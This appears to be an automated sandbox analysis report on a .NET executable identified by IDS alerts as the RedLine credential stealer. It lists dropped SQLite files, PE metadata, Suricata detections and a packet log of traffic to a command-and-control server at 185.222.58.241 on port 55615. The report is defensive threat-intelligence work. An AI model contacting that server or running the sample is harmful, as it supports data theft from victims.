File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA480.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA481.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA4A1.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA4B2.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA4C2.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDE52.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDE62.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDE63.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDE93.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDEA4.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDEA5.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDEA6.tmp

Download File

Process:	C:\Users\user\Desktop\8ZVd2S51fr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.39883934230205
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	8ZVd2S51fr.exe
File size:	826'368 bytes
MD5:	4376650c9845c351ba30d405b17d3502
SHA1:	5c2d70381a10d51d776365eea6f513a85597b3f3
SHA256:	b3af9675cef7e3a371e7a3d98d141b2bc6cbbc5da2df140dc09cf918ee3c62da
SHA512:	6b5c65c0cbd55ba99cf1b176f9073c3009bb8588a22c6ae9e8aa9ab1edd4514e2939e2882c7d2cc06112a47ecd384974c6fca6c3ffd94bc5e355790349b5f19a
SSDEEP:	12288:LcsCELA+12Hd5lpvS36pDfi/xN3xKwcOrrNCtzV2VzxWWopuRJqbs4COMTp8bDx5:89Orr0zVKzxW1AJq0OPqpAEmnc
TLSH:	EC059F20B7F89E67E27AA1F3DB84821197B6D145757BE3AA0CC560CE26D27311383D27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0..\|............... ........@.. ....................................@................................

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x4c9be6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673EA585 [Thu Nov 21 03:14:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc9b94	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xca000	0x1acc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc7bec	0xc7c00	5eb568556094e3c120786114748069da	False	0.6886708972152691	data	7.402732015267434	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xca000	0x1acc	0x1c00	90eb3eb244a8050f4c4aece15285fe0a	False	0.7664620535714286	data	7.257160141116293	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xcc000	0xc	0x200	926efff3d6b3e35f21dbf0f43e2fb9e7	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xca160	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8863383931877082
RT_GROUP_ICON	0xcb67c	0x14	data	0.9
RT_GROUP_ICON	0xcb690	0x14	data	1.05
RT_VERSION	0xcb6a4	0x23c	data	0.46853146853146854
RT_MANIFEST	0xcb8e0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-24T20:12:03.389377+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.5	49707	185.222.58.241	55615	TCP
2024-11-24T20:12:08.768750+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	185.222.58.241	55615	192.168.2.5	49707	TCP
2024-11-24T20:12:09.418109+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.5	49707	185.222.58.241	55615	TCP
2024-11-24T20:12:13.365274+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	185.222.58.241	55615	192.168.2.5	49707	TCP
2024-11-24T20:12:13.365274+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.222.58.241	55615	192.168.2.5	49707	TCP
2024-11-24T20:12:14.130434+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.5	49711	185.222.58.241	55615	TCP
2024-11-24T20:12:20.737400+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.5	49715	185.222.58.241	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 20:12:01.922436953 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:02.045463085 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:02.045624018 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:02.060913086 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:02.186280012 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:02.405213118 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:02.528415918 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:03.333905935 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:03.389377117 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:03.578752995 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:03.623744965 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:08.644304037 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:08.768749952 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:08.999134064 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:09.048285961 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:09.092626095 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:09.119187117 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:09.417953014 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:09.418026924 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:09.418065071 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:09.418103933 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:09.418108940 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:09.418212891 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.237859011 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.238282919 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.365273952 CET	55615	49707	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.365319967 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.365371943 CET	49707	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.365420103 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.366044044 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.485908985 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.717873096 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.844290972 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.844336987 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.844373941 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.844393015 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.844405890 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.844435930 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.844463110 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.844464064 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.844485998 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.844505072 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.844512939 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.844541073 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.844578981 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.844611883 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.968477011 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.968570948 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.968635082 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.968651056 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.968700886 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.968849897 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.968902111 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.969033003 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.969083071 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.969088078 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.969131947 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.969134092 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.969158888 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:13.969176054 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:13.969212055 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.009725094 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.009785891 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.129055977 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.130434036 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.250245094 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.250334024 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.369820118 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.369945049 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.370955944 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.371015072 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.452843904 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.452924013 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.452960014 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.453017950 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.453315973 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.453360081 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.453368902 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.453413963 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.453442097 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.453473091 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.453505993 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.491709948 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.491739988 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.491765022 CET	49711	55615	192.168.2.5	185.222.58.241
